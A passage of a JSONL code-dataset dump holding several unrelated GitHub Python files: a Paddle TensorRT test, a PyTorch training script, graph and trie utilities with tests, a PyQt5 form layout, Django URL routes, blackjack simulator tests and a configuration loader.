self.dynamic_shape.opt_input_shape = {\n \"input_data\": [3, 3, 3],\n \"update_data\": [3, 2, 3],\n }\n\n def clear_dynamic_shape():\n self.dynamic_shape.max_input_shape = {}\n self.dynamic_shape.min_input_shape = {}\n self.dynamic_shape.opt_input_shape = {}\n\n def generate_trt_nodes_num(attrs, dynamic_shape):\n if dynamic_shape:\n ver = paddle_infer.get_trt_compile_version()\n if self.update_scalar:\n if ver[0] * 1000 + ver[1] * 100 + ver[2] * 10 < 8200:\n return 1, 3\n return 1, 2\n else:\n if ver[0] * 1000 + ver[1] * 100 + ver[2] * 10 < 8200:\n return 1, 4\n return 1, 3\n\n attrs = [\n program_config.ops[i].attrs for i in range(len(program_config.ops))\n ]\n\n generate_dynamic_shape(attrs)\n self.trt_param.precision = paddle_infer.PrecisionType.Float32\n program_config.set_input_type(np.float32)\n self.trt_param.workspace_size = 2013265920\n yield self.create_inference_config(), generate_trt_nodes_num(\n attrs, True\n ), (1e-5, 1e-4)\n\n def test(self):\n self.run_test()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"chen2016013/Paddle","sub_path":"test/ir/inference/test_trt_convert_set_value.py","file_name":"test_trt_convert_set_value.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"15685509888","text":"import torch.nn as nn\nimport torch as t\nfrom utils import get_frames,process_frames, SpeedDataset, split_data, get_targets\nfrom model import get_nvidia_model\nimport sys\n\n\ndef train(model, training_generator, device):\n print(\"Start training\")\n epochs = 5\n criterion = nn.MSELoss()\n optimizer = t.optim.Adam(model.parameters(), lr=0.001)\n for epoch in range(epochs):\n running_loss = 0.0\n for i, data in enumerate(training_generator, 0):\n inputs, labels = data\n inputs, labels = inputs.to(device), labels.to(device)\n\n optimizer.zero_grad()\n\n outputs = model(inputs)\n labels = labels.float()\n outputs = outputs.flatten()\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n if i % 200 == 199:\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / 200))\n running_loss = 0.0\n\n print('finished training')\n return\n\nif __name__ == '__main__':\n\n if len(sys.argv) != 3:\n sys.exit(\"Improper number of args\")\n\n train_path = sys.argv[1]\n #test_path = '/Users/pallekc/Jobs/comma/speed_challenge_2017/data/test.mp4'\n train_targets = sys.argv[2]\n\n model = get_nvidia_model()\n if t.cuda.is_available():\n model.cuda()\n device = t.device(\"cuda:0\" if t.cuda.is_available() else \"cpu\")\n print('device ',device)\n train_frames, train_frames_count = get_frames(train_path)\n train_targets, train_targets_count = get_targets(train_targets)\n assert train_frames_count == train_targets_count, 'Number of train frames != targets'\n\n train_processed = process_frames(train_frames, train_targets) # remember the first one is missing\n train_x, train_y, test_x, test_y = split_data(train_processed)\n\n train_dataset = SpeedDataset(train_x, train_y)\n training_generator = t.utils.data.DataLoader(train_dataset, batch_size=8, shuffle=True)\n\n # train_x, train_y, val_x, val_y = split_data(train_x, train_y)\n # val_dataset = SpeedDataset(val_x, val_y)\n # val_generator = t.utils.data.DataLoader(val_dataset, batch_size=8, shuffle=True)\n\n train(model, training_generator, device)\n","repo_name":"pallekc91/SpeedChallenge2017","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26410728311","text":"# A showcase of different types of loops.\n\nprint (\"Example of a while loop counting backwards.\")\n\ni = 20\n\nwhile i > 0:\n print (i)\n i = i - 1\n\nprint (\"Printing even numbers from 1-20.\")\n\ni = 20\n\nfor i in range (0, i+2):\n\tif i % 2 == 0:\n\t\tprint (i)\n\nprint (\"Asterisk chain loop\")\n\nstars = \"*****\"\nfor i in range(0 ,5):\n index = i + 1\n print (stars[0:index])\n\nprint (\"Highest common denominator between two positive integers, where x = 24 and y = 60.\")\n\nimport math\n\nx = 24\ny = 60\n\nprint (math.gcd(x, y))","repo_name":"Asterisk555/HyperionDev","sub_path":"T10 - For Loop/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24826791751","text":"import graphviz as gv\n\n__author__ = 'danidee'\n\n\nclass DrawGraph:\n\n\n \"\"\"\n This class handles the generation of datatypes(lists) to enable graphviz\n draw the graphs of the activities using activities on nodes\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def generate_paths(unordered):\n \"\"\"\n This method gets all the paths in the project appends Start and Finish to them and then splits them into\n sublists of graph edges e.g [[A, B, C]] becomes [[[Start, A]], [[A, B]], [[B, C]], [[C, Finish]]]\n they're nested this way because label_graph will append a dictionary containing properties that style the\n directed graph when passed to graphviz, in this method we're still working with pure Activity objects, they've\n not been substitued with their id's\n :param unordered: List of all possible paths in the project\n :return: Nested Sublist of graph edges e.g [[A, B, C]] becomes [[[Start, A]], [[A, B]], [[B, C]], [[C, Finish]]]\n \"\"\"\n paths = [[activity for activity in path] for path in unordered]\n\n graph_path = list()\n for b in paths:\n b.insert(0, 'Start')\n b.append('Finish')\n for c in zip(b, b[1:]):\n ind_lists = [list(c)]\n graph_path.append(ind_lists)\n\n print(graph_path)\n return graph_path\n\n @staticmethod\n def label_graph(graph_path):\n \"\"\"\n This method styles the graph by adding a dictionary to each edge in graph_path, this attributes of the\n dictionary tell graphviz how to style our graph\n :param graph_path: nested sublists of edges in the graph\n :return: nested sublists where each activity has been substituted with it's id (so graphviz can draw)\n \"\"\"\n for a in graph_path:\n a.append({})\n\n # if the first element == Start it will fail to get a duration and throw an AttributeError, if so set the\n # duration as 0\n try:\n duration = a[0][0].duration\n except AttributeError:\n a[1].update({'label': str(0)})\n\n # if the first activity after Start is a critical activity update the graph line to red\n if a[0][1].is_critical:\n a[1].update({'color': 'red'})\n continue\n\n duration = int(duration) if duration % 1 == 0.0 else duration\n a[1].update({'label': str(duration)})\n\n # if the first activity is a critical and the second activity is critical also update the graph line to red\n if a[0][0].is_critical and getattr(a[0][1], 'is_critical', False):\n a[1].update({'color': 'red'})\n\n # if the first activity is critical we're at the end of the graph( =='Finish') update the graph line to red\n elif a[0][0].is_critical and a[0][1] == 'Finish':\n a[1].update({'color': 'red'})\n\n graph_path = [[[b.id if hasattr(b, 'id') else b for b in a[0]], a[1]] for a in graph_path]\n\n return graph_path\n\n @staticmethod\n def add_edges(graph, edges):\n \"\"\"\n Method that loops through the list of edges and adds the edges and their properties to the graph\n :param graph: graphviz graph\n :param edges: Nested sublists of graph edges (represented by their id's not pure Activity objects)\n :return:\n \"\"\"\n for e in edges:\n if isinstance(e[0], list):\n graph.edge(*e[0], **e[1])\n else:\n graph.edge(*e)\n return graph\n\n def draw(self, all_paths):\n \"\"\"\n :param all_paths: all the possible paths in the project\n :return: None\n \"\"\"\n\n graph = gv.Digraph(format='png')\n graph._head = 'strict digraph %s{' # i should not be doing this\n graph.node_attr['shape'] = 'circle'\n graph.graph_attr['rankdir'] = 'LR'\n unlabelled_edges = self.generate_paths(all_paths)\n labelled_edges = self.label_graph(unlabelled_edges)\n print(labelled_edges)\n graphviz_path = self.add_edges(graph, labelled_edges)\n graphviz_path.render('graphs/network_diagram')\n\nif __name__ == '__main__':\n main()\n","repo_name":"danidee10/Maven","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39596901119","text":"import unittest\nimport trie_methods\nimport graph\nimport trie_builder\n\n\nclass test_method_is_gen(unittest.TestCase):\n # Input: string. Output: true / false\n # Cases: not a string : type error\n # dna : true\n # not dna : false\n\n def test_not_string(self):\n s = None\n with self.assertRaises(TypeError):\n trie_methods.is_gen(s)\n\n def test_true(self):\n s = 'cga'\n val = trie_methods.is_gen(s)\n self.assertTrue(val)\n\n def test_false(self):\n s = 'tge'\n val = trie_methods.is_gen(s)\n self.assertFalse(val)\n\n\nclass test_method_name(unittest.TestCase):\n # Output: random string of six characters\n def test_normal(self):\n s = trie_methods.name()\n self.assertIsInstance(s, str)\n self.assertEqual(len(s), 6)\n\n\nclass test_method_edge_exists(unittest.TestCase):\n # input: s, x, trie; output: true/false\n def test_method_true(self):\n s = 'c'\n x = 'A'\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.edge('f', 'A', 'B', 'c')\n val = trie_methods.edge_exists(s, x, trie)\n self.assertTrue(val)\n\n def test_method_false(self):\n s = 'c'\n x = 'A'\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.node('C')\n trie.edge('f', 'A', 'B', 'g')\n trie.edge('g', 'A', 'C', 't')\n\n val = trie_methods.edge_exists(s, x, trie)\n self.assertFalse(val)\n\n\nclass test_method_select(unittest.TestCase):\n def test_method_normal(self):\n s = 'c'\n x = 'A'\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.node('C')\n trie.node('D')\n trie.node('E')\n trie.edge('f', 'A', 'B', 'a')\n trie.edge('g', 'A', 'C', 'c')\n trie.edge('h', 'A', 'D', 'g')\n trie.edge('i', 'B', 'E', 'c')\n e = trie_methods.select(s, x, trie)\n self.assertEqual(e, 'g')\n\n\nclass test_method_root(unittest.TestCase):\n # Input: trie Output: node\n # Cases where this could go wrong?\n def test_method_normal(self):\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.node('C')\n trie.node('D')\n trie.node('E')\n trie.edge('f', 'A', 'B', 'a')\n trie.edge('g', 'A', 'C', 'c')\n trie.edge('h', 'B', 'D', 'a')\n trie.edge('i', 'C', 'E', 'g')\n r = trie_methods.root(trie)\n self.assertEqual(r, 'A')\n\n def test_single_node(self):\n trie = graph.Graph()\n trie.node('A')\n r = trie_methods.root(trie)\n self.assertEqual(r, 'A')\n\n def test_empty_trie(self):\n trie = graph.Graph()\n with self.assertRaises(ValueError):\n trie_methods.root(trie)\n\n def test_wrong_input(self):\n trie = None\n with self.assertRaises(TypeError):\n trie_methods.root(trie)\n\n\nclass test_method_trie_equivalence(unittest.TestCase):\n # Input: trie1, trie2. Output: true / false\n def test_normal(self):\n p1 = ['ag', 'ct', 'tt']\n p2 = ['tt', 'ct', 'ag']\n tr1 = trie_builder.PrefixTrieConstruction(p1)\n tr2 = trie_builder.PrefixTrieConstruction(p2)\n val = trie_methods.trie_equivalence(tr1, tr2)\n self.assertTrue(val)\n\n\nclass test_method_num_leaves(unittest.TestCase):\n # input: trie. output: int\n # Cases: single node : 1\n # two branches: 2\n # three complicated branches: 3\n\n def test_method_single(self):\n trie = graph.Graph()\n trie.node('A')\n val = trie_methods.num_leaves(trie)\n self.assertEqual(val, 1)\n\n def test_method_double(self):\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.edge('f', 'A', 'B', 'g')\n val = trie_methods.num_leaves(trie)\n self.assertEqual(val, 1)\n\n def test_method_complex(self):\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.edge('f', 'A', 'B', 'g')\n trie.node('C')\n trie.node('D')\n trie.node('E')\n trie.edge('g', 'B', 'C', 't')\n trie.edge('h', 'B', 'D', 'a')\n trie.edge('i', 'A', 'E', 'c')\n val = trie_methods.num_leaves(trie)\n self.assertEqual(val, 3)\n\n\nclass test_method_arrived(unittest.TestCase):\n def test_normal(self):\n x = 'B'\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.edge('f', 'A', 'B', 'c')\n val = trie_methods.arrived(x, trie)\n self.assertTrue(val)\n\n def test_false(self):\n x = 'A'\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.edge('f', 'A', 'B', 'c')\n val = trie_methods.arrived(x, trie)\n self.assertFalse(val)\n\n\nclass test_method_num_edges(unittest.TestCase):\n def test_normal(self):\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.node('C')\n trie.edge('f', 'A', 'B', 'c')\n trie.edge('g', 'A', 'C', 't')\n\n val = trie_methods.num_edges(trie)\n self.assertEqual(val, 2)\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"juliushamilton/match_loc","sub_path":"test_trie_methods.py","file_name":"test_trie_methods.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16101246758","text":"from question_model import Question\nfrom data import question_data\nfrom quiz_brain import QuizBrain\n\nquestion_bank = []\nfor question in question_data:\n question_bank.append(Question(question['question'], question['correct_answer']))\n\nqb = QuizBrain(question_bank)\n\nwhile qb.still_has_question():\n qb.input()\n\nprint(\"You've completed the quiz.\")\nprint(f\"The final score is {qb.get_score()}/{qb.get_q_num()}.\")","repo_name":"jcongmon/python100DOC","sub_path":"Day 17/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32059262947","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport styles\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(1035, 690)\n MainWindow.setStyleSheet(styles.only_background)\n\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 1040, 670))\n self.tabWidget.setStyleSheet(styles.only_background)\n self.tabWidget.setObjectName(\"tabWidget\")\n\n self.scripts = QtWidgets.QWidget()\n self.scripts.setObjectName(\"scripts\")\n\n self.all_scenes = QtWidgets.QLabel(self.scripts)\n self.all_scenes.setGeometry(QtCore.QRect(30, 10, 120, 30))\n self.all_scenes.setFont(styles.font_for_labels)\n self.all_scenes.setStyleSheet(styles.color_labels)\n self.all_scenes.setObjectName(\"all_scenes\")\n\n self.list = QtWidgets.QListWidget(self.scripts)\n self.list.setGeometry(QtCore.QRect(20, 50, 400, 570))\n self.list.setFont(styles.font_list)\n self.list.setStyleSheet(styles.for_list)\n self.list.setObjectName(\"list\")\n\n self.add = QtWidgets.QPushButton(self.scripts)\n self.add.setGeometry(QtCore.QRect(310, 10, 110, 30))\n self.add.setFont(styles.font_big_btn)\n self.add.setMouseTracking(False)\n self.add.setStyleSheet(styles.for_orange_btn)\n self.add.setCheckable(False)\n self.add.setObjectName(\"add\")\n\n self.frame = QtWidgets.QFrame(self.scripts)\n self.frame.setVisible(False)\n self.frame.setGeometry(QtCore.QRect(450, 10, 570, 620))\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n\n self.name = QtWidgets.QLineEdit(self.frame)\n self.name.setPlaceholderText(\"Название скрипта\")\n self.name.setGeometry(QtCore.QRect(10, 50, 370, 35))\n self.name.setFont(styles.default_font)\n self.name.setStyleSheet(styles.for_line_edit)\n self.name.setAlignment(QtCore.Qt.AlignCenter)\n self.name.setObjectName(\"name\")\n\n self.add_scene = QtWidgets.QLabel(self.frame)\n self.add_scene.setGeometry(QtCore.QRect(10, 10, 200, 30))\n self.add_scene.setFont(styles.font_for_labels)\n self.add_scene.setStyleSheet(styles.color_labels)\n self.add_scene.setObjectName(\"add_scene\")\n\n self.add_act = QtWidgets.QPushButton(self.frame)\n self.add_act.setGeometry(QtCore.QRect(10, 330, 120, 30))\n self.add_act.setFont(styles.font_ltl_btn)\n self.add_act.setMouseTracking(False)\n self.add_act.setStyleSheet(styles.for_btn)\n self.add_act.setCheckable(False)\n self.add_act.setObjectName(\"add_act\")\n\n self.check = QtWidgets.QComboBox(self.frame)\n self.check.setGeometry(QtCore.QRect(140, 223, 111, 31))\n self.check.setFont(styles.default_font)\n self.check.setMouseTracking(False)\n self.check.setStyleSheet(styles.for_combobox)\n self.check.setObjectName(\"check\")\n\n self.add_act_res = QtWidgets.QPushButton(self.frame)\n self.add_act_res.setGeometry(QtCore.QRect(20, 223, 111, 31))\n self.add_act_res.setVisible(False)\n self.add_act_res.setText('Добавить')\n self.add_act_res.setFont(styles.font_ltl_btn)\n self.add_act_res.setMouseTracking(False)\n self.add_act_res.setStyleSheet(styles.for_orange_btn)\n self.add_act_res.setCheckable(False)\n self.add_act_res.setObjectName(\"add_act\")\n\n self.add_bf = QtWidgets.QPushButton(self.frame)\n self.add_bf.setGeometry(QtCore.QRect(20, 223, 111, 31))\n self.add_bf.setVisible(False)\n self.add_bf.setText('Добавить перед')\n self.add_bf.setFont(styles.font_ltl_btn)\n self.add_bf.setMouseTracking(False)\n self.add_bf.setStyleSheet(styles.for_orange_btn)\n self.add_bf.setCheckable(False)\n self.add_bf.setObjectName(\"add_act\")\n\n self.save_act = QtWidgets.QPushButton(self.frame)\n self.save_act.setGeometry(QtCore.QRect(20, 223, 111, 31))\n self.save_act.setVisible(False)\n self.save_act.setText('Сохранить')\n self.save_act.setFont(styles.font_ltl_btn)\n self.save_act.setMouseTracking(False)\n self.save_act.setStyleSheet(styles.for_orange_btn)\n self.save_act.setCheckable(False)\n self.save_act.setObjectName(\"save_act\")\n\n self.actions = QtWidgets.QTextBrowser(self.frame)\n self.actions.setPlaceholderText('Тут будет содержимое сценария')\n self.actions.setGeometry(QtCore.QRect(10, 90, 510, 230))\n self.actions.setFont(styles.default_font)\n self.actions.setStyleSheet(styles.for_actions)\n self.actions.setObjectName(\"actions\")\n\n self.save = QtWidgets.QPushButton(self.frame)\n self.save.setGeometry(QtCore.QRect(340, 5, 101, 30))\n self.save.setText('Сохранить')\n self.save.setFont(styles.font_big_btn)\n self.save.setMouseTracking(False)\n self.save.setStyleSheet(styles.for_orange_btn)\n self.save.setCheckable(False)\n self.save.setObjectName(\"save\")\n\n self.cancel_script = QtWidgets.QPushButton(self.frame)\n self.cancel_script.setGeometry(QtCore.QRect(260, 5, 75, 30))\n self.cancel_script.setText('Отменить')\n self.cancel_script.setFont(styles.font_ltl_btn)\n self.cancel_script.setMouseTracking(False)\n self.cancel_script.setStyleSheet(styles.for_btn)\n self.cancel_script.setCheckable(False)\n self.cancel_script.setObjectName(\"cancel_script\")\n\n self.del_script = QtWidgets.QPushButton(self.frame)\n self.del_script.setGeometry(QtCore.QRect(260, 5, 75, 30))\n self.del_script.setText('Удалить')\n self.del_script.setFont(styles.font_ltl_btn)\n self.del_script.setMouseTracking(False)\n self.del_script.setStyleSheet(styles.for_btn)\n self.del_script.setCheckable(False)\n self.del_script.setVisible(False)\n self.del_script.setObjectName(\"del_script\")\n\n self.edit = QtWidgets.QPushButton(self.frame)\n self.edit.setGeometry(QtCore.QRect(340, 5, 101, 30))\n self.edit.setText('Изменить')\n self.edit.setVisible(False)\n self.edit.setFont(styles.font_big_btn)\n self.edit.setMouseTracking(False)\n self.edit.setStyleSheet(styles.for_orange_btn)\n self.edit.setCheckable(False)\n self.edit.setObjectName(\"edit\")\n\n self.save_edit = QtWidgets.QPushButton(self.frame)\n self.save_edit.setGeometry(QtCore.QRect(340, 5, 101, 30))\n self.save_edit.setText('Сохранить')\n self.save_edit.setFont(styles.font_big_btn)\n self.save_edit.setMouseTracking(False)\n self.save_edit.setStyleSheet(styles.for_orange_btn)\n self.save_edit.setCheckable(False)\n self.save_edit.setObjectName(\"save_edit\")\n self.save_edit.setVisible(False)\n\n self.frame_2 = QtWidgets.QFrame(self.frame)\n self.frame_2.setVisible(False)\n self.frame_2.setGeometry(QtCore.QRect(19, 259, 421, 171))\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n\n self.cancel = QtWidgets.QPushButton(self.frame)\n self.cancel.setGeometry(QtCore.QRect(330, 223, 111, 31))\n self.cancel.setFont(styles.font_ltl_btn)\n self.cancel.setText('Отменить')\n self.cancel.setMouseTracking(False)\n self.cancel.setStyleSheet(styles.for_btn)\n self.cancel.setCheckable(False)\n self.cancel.setObjectName(\"сancel\")\n self.cancel.setVisible(False)\n\n self.delete_act = QtWidgets.QPushButton(self.frame)\n self.delete_act.setGeometry(QtCore.QRect(330, 223, 111, 31))\n self.delete_act.setFont(styles.font_ltl_btn)\n self.delete_act.setText('Удалить')\n self.delete_act.setMouseTracking(False)\n self.delete_act.setStyleSheet(styles.for_btn)\n self.delete_act.setCheckable(False)\n self.delete_act.setObjectName(\"delete_act\")\n self.delete_act.setVisible(False)\n\n self.code = QtWidgets.QLineEdit(self.frame_2)\n self.code.setPlaceholderText('Метка класса')\n self.code.setGeometry(QtCore.QRect(0, 10, 191, 30))\n self.code.setFont(styles.default_font)\n self.code.setStyleSheet(styles.for_line_edit)\n self.code.setAlignment(QtCore.Qt.AlignCenter)\n self.code.setObjectName(\"code\")\n\n self.text = QtWidgets.QLineEdit(self.frame_2)\n self.text.setPlaceholderText('Текст команды')\n self.text.setGeometry(QtCore.QRect(0, 53, 420, 30))\n self.text.setFont(styles.default_font)\n self.text.setStyleSheet(styles.for_line_edit)\n self.text.setAlignment(QtCore.Qt.AlignCenter)\n self.text.setObjectName(\"text\")\n\n self.record_2 = QtWidgets.QCheckBox(self.frame_2)\n self.record_2.setGeometry(QtCore.QRect(220, 100, 201, 20))\n self.record_2.setFont(styles.font_check)\n self.record_2.setObjectName(\"record_2\")\n\n self.duration = QtWidgets.QLineEdit(self.frame_2)\n self.duration.setPlaceholderText('Длительность (сек.)')\n self.duration.setGeometry(QtCore.QRect(0, 95, 191, 30))\n self.duration.setFont(styles.default_font)\n self.duration.setStyleSheet(styles.for_line_edit)\n self.duration.setAlignment(QtCore.Qt.AlignCenter)\n self.duration.setObjectName(\"duration\")\n\n self.add_act_2 = QtWidgets.QPushButton(self.frame_2)\n self.add_act_2.setGeometry(QtCore.QRect(0, 140, 221, 30))\n self.add_act_2.setFont(styles.font_ltl_btn)\n self.add_act_2.setMouseTracking(False)\n self.add_act_2.setStyleSheet(styles.for_btn)\n self.add_act_2.setCheckable(False)\n self.add_act_2.setObjectName(\"add_act_2\")\n\n self.add_act_3 = QtWidgets.QPushButton(self.frame_2)\n self.add_act_3.setGeometry(QtCore.QRect(0, 140, 221, 30))\n self.add_act_3.setText('Отмена')\n self.add_act_3.setFont(styles.font_ltl_btn)\n self.add_act_3.setMouseTracking(False)\n self.add_act_3.setStyleSheet(styles.for_orange_btn)\n self.add_act_3.setCheckable(False)\n self.add_act_3.setObjectName(\"add_act_3\")\n self.add_act_3.setVisible(False)\n\n self.add_before = QtWidgets.QPushButton(self.frame_2)\n self.add_before.setGeometry(QtCore.QRect(0, 140, 221, 30))\n self.add_before.setFont(styles.font_ltl_btn)\n self.add_before.setMouseTracking(False)\n self.add_before.setText('Добавить действие перед')\n self.add_before.setVisible(False)\n self.add_before.setStyleSheet(styles.for_btn)\n self.add_before.setCheckable(False)\n self.add_before.setObjectName(\"add_before\")\n\n self.duration_rest = QtWidgets.QLineEdit(self.frame_2)\n self.duration_rest.setPlaceholderText('Длительность (сек.)')\n self.duration_rest.setVisible(False)\n self.duration_rest.setEnabled(True)\n self.duration_rest.setGeometry(QtCore.QRect(230, 140, 191, 30))\n self.duration_rest.setFont(styles.default_font)\n self.duration_rest.setStyleSheet(styles.for_line_edit)\n self.duration_rest.setAlignment(QtCore.Qt.AlignCenter)\n self.duration_rest.setObjectName(\"duration_rest\")\n\n self.tabWidget.addTab(self.scripts, \"\")\n self.record = QtWidgets.QWidget()\n self.record.setObjectName(\"record\")\n self.tabWidget.addTab(self.record, \"\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 996, 21))\n self.menubar.setObjectName(\"menubar\")\n self.menuFile = QtWidgets.QMenu(self.menubar)\n self.menuFile.setObjectName(\"menuFile\")\n self.menuSettings = QtWidgets.QMenu(self.menubar)\n self.menuSettings.setObjectName(\"menuSettings\")\n MainWindow.setMenuBar(self.menubar)\n self.actionImport = QtWidgets.QAction(MainWindow)\n self.actionImport.setObjectName(\"actionImport\")\n self.actionExport = QtWidgets.QAction(MainWindow)\n self.actionExport.setObjectName(\"actionExport\")\n self.menuFile.addAction(self.actionImport)\n self.menuFile.addAction(self.actionExport)\n self.menubar.addAction(self.menuFile.menuAction())\n self.menubar.addAction(self.menuSettings.menuAction())\n\n self.retranslateUi(MainWindow)\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.all_scenes.setText(_translate(\"MainWindow\", \"Сценарии\"))\n self.add.setText(_translate(\"MainWindow\", \"Добавить\"))\n self.add_scene.setText(_translate(\"MainWindow\", \"Добавление сценария\"))\n self.add_act.setText(_translate(\"MainWindow\", \"Новое действие\"))\n self.save.setText(_translate(\"MainWindow\", \"Сохранить\"))\n self.record_2.setText(_translate(\"MainWindow\", \"Записывать данные на шаге\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.scripts), _translate(\"MainWindow\", \"Сценарии\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.record), _translate(\"MainWindow\", \"Запись данных\"))\n self.menuFile.setTitle(_translate(\"MainWindow\", \"File\"))\n self.menuSettings.setTitle(_translate(\"MainWindow\", \"Settings\"))\n self.actionImport.setText(_translate(\"MainWindow\", \"Import\"))\n self.actionExport.setText(_translate(\"MainWindow\", \"Export\"))\n","repo_name":"messageann/DataRecorder","sub_path":"Project/other/ui_old.py","file_name":"ui_old.py","file_ext":"py","file_size_in_byte":14199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1590084801","text":"from django.urls import re_path\nfrom .views import *\napp_name = 'oauth'\n\nurlpatterns = [\n # 获取QQ登录链接\n re_path(r'qq/login/$', QQAuthURLView.as_view()),\n # QQ登录成功回调\n re_path (r'oauth_callback.html/', QQAuthUserView.as_view()),\n\n]","repo_name":"Kaplc/MeiDuo","sub_path":"meiduo_project/meiduo_project/apps/oauth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74256670273","text":"import pytest\nimport os\nimport sys\n\nROOT = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\")\nsys.path.append(os.path.join(ROOT, \"src\"))\nfrom simulator import hard_policy, soft_policy, split_policy, betting_policy\nfrom blackjack import (\n Actions,\n Cards,\n Deck,\n Player,\n resolve_player_action,\n Hand,\n PlayerResultTypes,\n resolve_dealer_action,\n DealerResultTypes,\n play,\n resolve_environment,\n parallel_processing,\n)\nimport numpy as np\n\n\ndef test_overall_play():\n\n wager_amts = [1, 1, 1, 1, 1, 1, 4, 8, 16]\n ranges = [-3, -2, -1, 0, 0, 1, 2, 3]\n betting_policy = (wager_amts, ranges)\n\n player = Player(\n bankroll=100,\n hard_policy=hard_policy,\n soft_policy=soft_policy,\n split_policy=split_policy,\n betting_policy=betting_policy,\n )\n deck = Deck()\n # first hand player wins and wins 1 count is now 4\n cards_1 = [\n Cards.TEN,\n Cards.THREE,\n Cards.TEN,\n Cards.FOUR,\n Cards.THREE,\n Cards.FOUR,\n Cards.TWO,\n Cards.FOUR,\n ]\n cards_2 = [\n Cards.TEN,\n Cards.THREE,\n Cards.TEN,\n Cards.FOUR,\n Cards.JACK,\n Cards.ACE,\n Cards.TEN,\n Cards.TEN,\n ]\n # second hand player wagers 16 and wins 16*1.5 = 24\n deck.set_cards(cards_2 + cards_1)\n\n resolve_environment(player, deck, 8, 1, 0.001)\n assert player.get_bankroll() == 101\n assert deck.get_count() == 4\n assert player.calculate_wager(deck.get_true_count()) == 16\n resolve_environment(player, deck, 8, 1, 0.001)\n assert player.get_bankroll() == 125\n\n\ndef test_parallel():\n player = Player(\n bankroll=10000,\n hard_policy=hard_policy,\n soft_policy=soft_policy,\n split_policy=split_policy,\n betting_policy=betting_policy,\n )\n output = parallel_processing(player=player, iterations=100, n_samples=10)\n assert len(output) == 10\n","repo_name":"yjs1210/cardcounting","sub_path":"tests/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74673521155","text":"import traceback\r\nimport json\r\nimport os, sys, time\r\nimport uuid\r\n####################################\r\ndef configurationReader():\r\n try:\r\n settings = {}\r\n f = open('config', 'r')\r\n mode = f.readline().strip()\r\n print('MITTARISTO BACKEND APPLICATION RUNNING IN MODE: ', mode)\r\n configuration = json.load(open(\"app_config.json\", \"r\"))\r\n for key, value in configuration.items():\r\n if key == mode:\r\n settings['APP_DB_USER'] = value['DB_USER']\r\n settings['APP_DB_PWD'] = value['DB_PWD']\r\n settings['APP_DB_NAME'] = value['DB_NAME']\r\n settings['APP_DB_PORT'] = value['DB_PORT']\r\n settings['APP_DB_HOST'] = value['DB_HOST']\r\n settings['APP_OS_PWD'] = value['OS_PWD']\r\n settings['APP_OS_REPORT_DIR'] = value['OS_REPORT_DIR']\r\n settings['APP_FE_URL'] = value['APP_FE_URL']\r\n settings['APP_BE_PUBLIC_IP'] = value['APP_BE_PUBLIC_IP']\r\n settings['APP_BE_LOCAL_IP'] = value['APP_BE_LOCAL_IP']\r\n settings['APP_BE_PUBLIC_PORT'] = value['APP_BE_PUBLIC_PORT']\r\n 